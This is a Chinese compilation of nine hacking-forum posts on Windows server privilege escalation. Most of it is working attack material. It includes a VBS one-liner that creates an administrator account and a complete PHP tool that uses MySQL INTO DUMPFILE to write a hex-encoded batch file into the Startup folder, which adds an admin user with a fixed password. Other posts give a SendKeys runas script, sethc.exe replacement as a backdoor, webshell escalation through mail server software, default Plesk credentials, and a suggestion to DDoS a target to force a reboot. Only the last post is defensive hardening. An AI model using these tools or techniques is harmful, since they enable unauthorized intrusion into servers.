Echo 写入VBS提权

Echo 写入VBS提权（精选9篇）由网友“鬼咧”投稿提供，下面是小编为大家推荐的Echo 写入VBS提权，欢迎阅读，希望大家能够喜欢。

篇1：Echo 写入VBS提权

有时候遇到非英语国家的机器,net localgroup administrators mickey /add 是不会成功的，因为他们的administrators字符不是这么写的，比如俄国，德国，这时候可以用下面的脚本来添加管理员账号，来绕过限制，

Echo 写入VBS提权

，

C:>echo Set o=CreateObject( “Shell.Users” ):Set z=o.create(“heimian”):z.changePassword “heimian”,””:z.setting(“AccountType”)=3 >c:a.vbe

篇2：mysql启动项写入提权

if (get_magic_quotes_gpc) {

function stripslashes_deep($value)

{

$value = is_array($value) ?

array_map('stripslashes_deep', $value) :

stripslashes($value);

return $value;

}

$_POST = array_map('stripslashes_deep', $_POST);

$_GET = array_map('stripslashes_deep', $_GET);

$_COOKIE = array_map('stripslashes_deep', $_COOKIE);

$_REQUEST = array_map('stripslashes_deep', $_REQUEST);

}

session_start();

if($_GET['action']=='logout'){

foreach($_COOKIE[“connect”] as $key=>$value){

setcookie(“connect[$key]”,“”,time()-1);

}

header(“Location:”.$_SERVER[“SCRIPT_NAME”]);

}

if(!empty($_POST['submit'])){

setcookie(“connect”);

setcookie(“connect[host]”,$_POST['host']);

setcookie(“connect[name]”,$_POST['name']);

setcookie(“connect[pass]”,$_POST['pass']);

setcookie(“connect[dbname]”,$_POST['dbname']);

echo “”;

}

/*

foreach($_COOKIE[“connect”] as $key=>$value){

echo $key.“:”.$value.“

”;

}

*/

if(empty($_GET[“action”])){

?>

MYSQL利用启动项提权工具

host:

name:

pass:

dbname:

Copyright By Mix0xrn

Blog:www.h4x0er.com BBs:team.f4ck.net

版本更新

exit;

}

$link=@mysql_connect($_COOKIE[“connect”][“host”],$_COOKIE[“connect”][“name”],$_COOKIE[“connect”][“pass”]);

if(!$link){

echo “连接失败.”.mysql_error().“返回重填”;

exit;

}else{

echo “连接成功

”;

$str=mysql_get_server_info();

echo 'MYSQL版本:'.$str.“

”;

echo “

if($str[2]>=1){

$path=$_SESSION['path']='C:/Documents and Settings/Administrator/「开始」菜单/程序/启动/xg.bat';

}else{

$path=$_SESSION['path']='C:/Documents and Settings/Administrator/「开始」菜单/程序/启动/xg.bat';

}

}

$conn=mysql_select_db($_COOKIE[“connect”][“dbname”],$link);

if(!$conn){

echo “数据不存在.”.mysql_error().“返回重填”;

exit;

}else{

echo “数据库--”.$_COOKIE['connect']['dbname'].“--存在

”;

}

echo '点击退出';

echo '';

echo '';

echo   '';

echo     '当前路径:';

echo     “”;

echo   '';

echo   '';

echo    '';

echo     '';

echo   '';

echo '';

echo'';

if($_POST['subfile']){

$upfile=$_POST['p'].$_FILES['file']['name'];

if(is_uploaded_file($_FILES['file']['tmp_name']))

{

if(!move_uploaded_file($_FILES['file']['tmp_name'],$upfile)){

echo '上传失败';

}else{

echo '上传成功,路径为'.$upfile;

}

}

}

echo '

echo '';

echo '';

echo '路径目录为';

echo “”;

echo '';

echo '';

echo '';

echo '

if($_POST['subbat']){

mysql_query('DROP TABLE Temp_bat');

$query=mysql_query('CREATE TABLE Temp_bat(bat BLOB);');

if(!$query){

echo '创建临时表Temp_bat失败请查看失败内容'.mysql_error();

}else{

$shellcode=batcode();

$query=“INSERT into Temp_bat values (CONVERT($shellcode,CHAR));”;

echo 'bat插入失败请查看失败内容'.mysql_error();

}else{

$query=“SELECT bat FROM Temp_bat INTO DUMPFILE '”.$path.“';” ;

if(!mysql_query($query)){

echo 'bat导出失败请查看失败内容'.mysql_error();

}else{

mysql_query('DROP TABLE Temp_bat');

echo '导出成功';

}

}

}

}

echo '';

echo '';

echo   '';

echo     '文件路径:';

echo     '';

echo   '';

echo   '';

echo     '目标路径:';

echo     '';

echo   '';

echo   '';

echo     '';

echo       '';

echo         '';

echo     '';

echo '';

echo '';

if(!empty($_POST['diy'])){

$diy=str_replace('','/',$_POST['diy']);

$diypath=str_replace('','/',$_POST['diypath']);

mysql_query('DROP TABLE diy_dll');

$s='create table diy_dll (cmd LONGBLOB)';

if(!mysql_query($s)){

echo '创建diy_dll表失败'.mysql_error();

}else{

$s=“insert into diy_dll (cmd) values (hex(load_file('$diy')))”;

if(!mysql_query($s)){

echo “插入自定义文件失败”.mysql_error();

}else{

$s=“SELECT unhex(cmd) FROM diy_dll INTO DUMPFILE '$diypath'”;

if(!mysql_query($s)){

echo “导出自定义dll出错”.mysql_error();

}else{

mysql_query('DROP TABLE diy_dll');

echo “成功导出自定义dll

”;

}

}

}

}

echo '

';

echo '

print(“

功能说明：

有些mysql由于各种xx错误导致不能直接UDF来提权

所以就 的改了这东西出来

在启动项处写进xg.bat

等服务器重启

创建帐号xiaoguai,密码www.h4x0er.com

”);

function batcode(){

return “0x6E65742075736572207869616F67756169207777772E6834783065722E636F6D202F6164640D0A6E6574206C6F63616C67726F75702061646D696E6973747261746F7273207869616F67756169202F616464”;

}

?>

篇3：VBS提权脚本（市面上少有喔^^）

@echo off

echo dim WshShell,cmd >> %3runas.vbs

echo cmd=“%SystemRoot%system32cmd.exe” >> %3runas.vbs

echo Set WshShell=WScript.CreateObject(“WScript.Shell”) >> %3runas.vbs

echo WshShell.Run cmd >> %3runas.vbs

echo WScript.Sleep 500 >> %3runas.vbs

echo WshShell.SendKeys“runas /user:Administrators%1 %3Bcmd.bat” >> %3runas.vbs

echo WshShell.SendKeys“{ENTER}” >> %3runas.vbs

echo WScript.Sleep 1000 >> %3runas.vbs

echo WshShell.SendKeys“%2” >> %3runas.vbs

echo WshShell.SendKeys“{ENTER}” >> %3runas.vbs

echo WScript.Sleep 500 >> %3runas.vbs

echo WshShell.SendKeys“exit” >> %3runas.vbs

echo WshShell.SendKeys“{ENTER}” >> %3runas.vbs

echo @echo off >> %3Bcmd.bat

echo %4 %5 %6 %7 %8 %9 >> %3Bcmd.bat

echo del %3runas.vbs >> %3Bcmd.bat

echo del %3Bcmd.bat >> %3Bcmd.bat

%3runas.vbs

以上保存为BAT

dim WshShell,cmd

cmd=“%SystemRoot%system32cmd.exe”

Set WshShell=WScript.CreateObject(“WScript.Shell”)

WshShell.Run cmd

WScript.Sleep 500

WshShell.SendKeys“runas /user:Administrators用户名 密码 命令”

WshShell.SendKeys“{ENTER}”

WScript.Sleep 1000

WshShell.SendKeys“%2”

WshShell.SendKeys“{ENTER}”

WScript.Sleep 500

WshShell.SendKeys“exit”

WshShell.SendKeys“{ENTER}”

以上保存为VBS

Runas

只有在通过自动登陆读到密码时才有用

篇4：迅雷提权方法

Kindle‘s blog

当我们使用迅雷下载东西的时候，会调用我们安装迅雷后一个htm文件，去激活htm文件里的一些代码，

把我们所下载东西添加到列表当中，

所对应的htm文件有2处一处是C:Program FilesThunder NetworkThunderProgramgeturl.htm

一处是C:Program FilesThunder NetworkThunderProgramgetAllurl.htm

如果我们想把我们想要的代码添加进去执行了？

我们简单写个代码试试，代码如下：

应该大家都可以看的出，如果我们把这段代码添加到那2个htm文件里，当迅雷下载东西的时候，一样

会去执行我们的代码，

添加一个administrators组的一个用户kindle

当然，代码大家可以自定义的..

测试通过，迅雷版本为5.9.2.927

篇5：另类提权详解

我先给大家说下我webshell的环境吧，

无 wscript.shell 组件，我记得网上有这么一篇文章： wscript.shell 上传个cmd.asp 可以执行命令，但我试过，

却无法显示网页。我一般拿到webshell 就要看

C:Documents and SettingsAdministrator「开始」菜单

C:Documents and SettingsAll Users「开始」菜单

这两个地址，简单确认下服务器安装的有哪些软件，可以利用某些软件漏洞来进行提权，很可惜这两个目

录都不能查看。

在扫描一下目标主机开放的有哪些端口，只有21 和 80 ，1433 我之后查看到到F盘内有几个文件目录可

以浏览我仔细看了下，原来有几个同服务器下的网站程序备份在F盘内，并且已经打包好了的，我点击下载

肯定是行不通的。我巧用webshell 把该文件复制到该站的目录里，接着就可以顺利下载了，嘿嘿~~下载成

功以后我查看到原来是一个DZ论坛程序，我查看到配置信息，我想可以利用mysql 提权了，上传了个

su.php上去，结果被杀，接着我对这个脚本进行300次循环加密，希望可以躲过杀软，待我在上传上去，结

果还是被杀，我想，应该是权限的原因，后来我随便找了个网站上的一个文件 rss.asp，进行修改为su.php

里的脚本，保存成功之后，还是被杀毒软件杀掉了rss.asp 这个文件，我汗~~最后我在网上找到一个可以连

接mysql 的工具，

工具名为：MYsql Tool 我也不知道行不行的通，填写好以后，还是连接不上。

最后我查看到了可以访问C:WINDOWSSYSTEM32 这个目录，也就是这个文章的重点。很多朋友可能都

知道五下shift后门这个吧?但却很少人知道原理。

后门原理：这个后门，可以说是微软系统的一个安全漏洞吧。简单点说，就是在登陆界面时，连按5下

shift键后，系统会以system的权限启动sethc.exe，也就是我说的系统默认的粘滞键所调用文件。

知道原理，思路就出来了。将sethc.exe替换成其他文件,比如说换成cmd.exe或者explorer.exe，

这样我们就可以执行命令，或者调用桌面程序了。也可以换句话说，可以为所欲为了。

本当我想这么做的时候，可惜权限不允许，不允许我删除 上传等，接着我又巧用了webshell，把原文件

sethc.exe移动到另外个目录或者盘符，然后我在上传我的shift后门，重命名为sethc.exe到原网站目录，在

复制或者移动到system32这个目录，就这样就拿到系统权限了。如遇到win2K 则需要重启后有效，怎么使

他重启，这就要看你了。不过我有个馊主意，你用肉鸡DDos以后在联系管理员说他网站被D了，之后管理

员有可能会重启下服务器，这下你就可以上去了。o(∩_∩)o...

篇6：虚拟主机提权简单总结

我们的分享和交流只是为了能让自己进步一点点，能带给基友们一点点帮助，可是在交流的过程中遇见了能提权的shell被人删除的情况，真想不通陌生的基友你为什么要这样自私呢，做个黑产拿几百个shell回去卖，你能富有吗？

第一：了解一些简单的虚拟主机识别

常见的虚拟主机识别：

星外虚拟主机主机D:freehostzhoudeyangwebPrim@Hosting 一般很难找到可执行目录，可以测试用远程调用cmd，exp来提权

虚拟主机D:hostingwwwroot vhostroot

分支D:VhostWebRoot51dancecn vhostrootD:vhostrootlocaluser

星外分支D:vhostrootLocalUsergdrt

新网虚拟主机D:virtualhostweb580651www  可以找到很多可执行目录，但是目前基本上大部分为windows 系统，提权有难度

华众虚拟主机E:wwwrootlongzhihuwwwroot  一般有安全模式

星外分支F:hostwz8088web

万网虚拟主机F:usrfw04408xpinfo  支持aspx的话应该能扫到可执行目录

其他的虚拟主机可以使用reg.aspx，getacl.aspx配合来识别

第二：是不是能找到可执行目录

主要asp.php和aspx的，我在这里主要介绍ASPX的：

Reg.aspx从注册表读取目录

Getacl.aspx遍历目录以及文件，获取当前用户可控制的目录或者文件

篇7：WinWebMail & 7i24提权

一、WinWebMail程序安装为系统服务，程序一般是在admin权限下运行的，而服务程序emsvr.exe是在system权限下运行的，这样，我们就可以通过这个漏洞来提升权限了，假设我们得到了一个低权的WebShell，有修改权限，服务器安装有WinWebMail，我们只要能够修改其中的opusers.ini文件，就可以利用这个漏洞提升权限了，加用户、开端口就随你了。

在硬盘分区为NTFS格式下，WinWebMail会要求安装目录为everyone可写，这是因为它是Web服务式的邮件系统，需要通过ASP文件读写用户邮箱，也就是对应于某个用户名的文件夹，而普通的ASP程序解析权限很低，所以必须得让WinWebMail所在的目录拥有everyone可写权限，不然程序会无法正常读写这些用户文件夹的。在FAT32格式下就更不用说了，我们可以随意修改popusers.ini文件，从而溢出获得更高权限了。

最后再说说远程利用的方法。因为我们可以通过Web来注册用户，所以可以利用抓包软件来修改注册信息，从而间接修改ini文件，等到服务器

重启的时候，就可以利用漏洞了。

该漏洞影响范围到3.7.3.1以前的版本

————————————————————————————————————

就是winwebmail邮件服务器系统，用户名和密码全部存在winwebmail的安装目录中popusers.ini文件里面！包括admin管理员用户！当然，密码是加密的！

我们要做的，就是在本地装一个相同版本的winwebmail，然后将本地加密过的已经密码代码，利用webshell替换掉服务器上的，这台mail服务器就到手了！（说白了还是因为WinWebMail会要求安装目录为everyone可写）

————————————————————————————————————

WinWebMail目录下的web必须设置everyone权限可读可写，不然邮件登陆不上去等等，所以在开始程序里找到winwebmail快捷方式下下来，看路径，访问 路径web传shell，访问shell后，默认权限是system，放远控进启动项，等待下次重启，

没有删cmd组建的直接加用户。

比如c:winwebmailweb，如果不能浏览换为d:winwebmailweb（一定要是web目录，本人多方测试c:winwebmail一样无权浏览）

另外如果查不出路径请用注册表读取：

HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesWinWebMail Serverimagepath

二、7i24的web目录也是可写，权限为administrator。

注： 7i24目录默认是可读可写，写进IISSAFE那个目录，访问 lan3a.com/iissafe/shell.asp

三、装有Magic Winmail的服务器会在系统上开启8080端口，对外提供邮件服务。使用过它的人应该知道。这个Magic Winmail服务器支持php脚本解析。Magic Winmail是不可以解析asp脚本的，Magic Winmail这边是php的世界。

X:Magic Winmailserverwebmail 该目录默认为system权限

网管在装Magic Winmail的时候肯定是以system级别的身份装的。当然Magic Winmail就继承了system级别的限权，而我们的Magic Winmail却可以解析php脚本，想当然我们可爱的php脚本就是system级别的脚本了。这个Magic Winmail软件有点像咱国产Netbox的味道。

篇8：关于plesk虚拟主机提权

这款虚拟机在国外比较流行，安全性能也很高，在这里记录下提权方法。

1.mysql的admin(原root)默认密码(setup)没改,通过mysql提权

2.Parallels Plesk Control Panel,在8880端口,默认用户名密码admin:setup

3.有注入点的情况下，db权限下写文件到启动项

篇9：针对udf.dll提权

删除udf.dll和langouster_udf.dll，新建udf.dll和langouster_udf.dll设为只读,权限上限制 可防止所有langouster_udf.dll专用网马

程序代码

net stop mysql

del %SystemRoot%system32udf.dll /A/F/Q

del %SystemRoot%udf.dll /A/F/Q

del %SystemRoot%tempudf.dll /A/F/Q

dir %SystemRoot%system32com > %SystemRoot%system32udf.dll

dir %SystemRoot%system32com > %SystemRoot%udf.dll

dir %SystemRoot%system32com > %SystemRoot%tempudf.dll

attrib +R +S +H %SystemRoot%system32udf.dll

attrib +R +S +H %SystemRoot%udf.dll

attrib +R +S +H %SystemRoot%tempudf.dll

cscript.exe xcacls.vbs “%SystemRoot%system32udf.dll” /D Everyone:M /E

cscript.exe xcacls.vbs “%SystemRoot%udf.dll” /D Everyone:M /E

cscript.exe xcacls.vbs “%SystemRoot%tempudf.dll” /D Everyone:M /E

del %SystemRoot%system32langouster_udf.dll /A/F/Q

del %SystemRoot%langouster_udf.dll /A/F/Q

del %SystemRoot%templangouster_udf.dll /A/F/Q

dir %SystemRoot%system32com > %SystemRoot%system32langouster_udf.dll

dir %SystemRoot%system32com > %SystemRoot%langouster_udf.dll

dir %SystemRoot%system32com > %SystemRoot%templangouster_udf.dll

attrib +R +S +H %SystemRoot%system32langouster_udf.dll

attrib +R +S +H %SystemRoot%langouster_udf.dll

attrib +R +S +H %SystemRoot%templangouster_udf.dll

cscript.exe xcacls.vbs “%SystemRoot%system32langouster_udf.dll” /D Everyone:M /E

cscript.exe xcacls.vbs “%SystemRoot%langouster_udf.dll” /D Everyone:M /E

cscript.exe xcacls.vbs “%SystemRoot%templangouster_udf.dll” /D Everyone:M /E

net start mysql

★ linux当mysql以root权限登录时提权网站安全

★ SA权限九种上传文件办法

★ FTP常用软件servu的安全权限处理WEB安全

★ vbs调用php脚本安全

★ 让脚本躲过杀毒软件脚本安全

★ 一个防注入的小白错误千博企业程序漏洞预警

★ 一次意外突破安全狗拿Shell

★ 端口转发软件rinetd安装部署linux服务器应用

★ 伪科学：Mysql system函数提权

★ dedecms 补出来的一个鸡肋漏洞漏洞预警

《Echo 写入VBS提权.doc》

将本文的Word文档下载到电脑，方便收藏和打印

推荐度：

点击下载文档

【Echo 写入VBS提权（精选9篇）】相关文章：

PHP安全 XSS篇2022-08-02

Windows 服务器入侵前兆检测方法技巧服务器教程2023-09-19

帝国CMS 留言本多字节漏洞漏洞预警2023-04-15

Discuz XSS得webshell脚本安全2022-05-08

如何入侵XP（xp入侵教程）2024-03-04

Windows IIS日志文件分析程序2024-03-11

LNK文件漏洞简要分析2023-01-25

Oracle深入学习2023-03-24

winserver终端服务自带的一些工具的简介2023-09-13

网站渗透思路全方面总结2023-01-18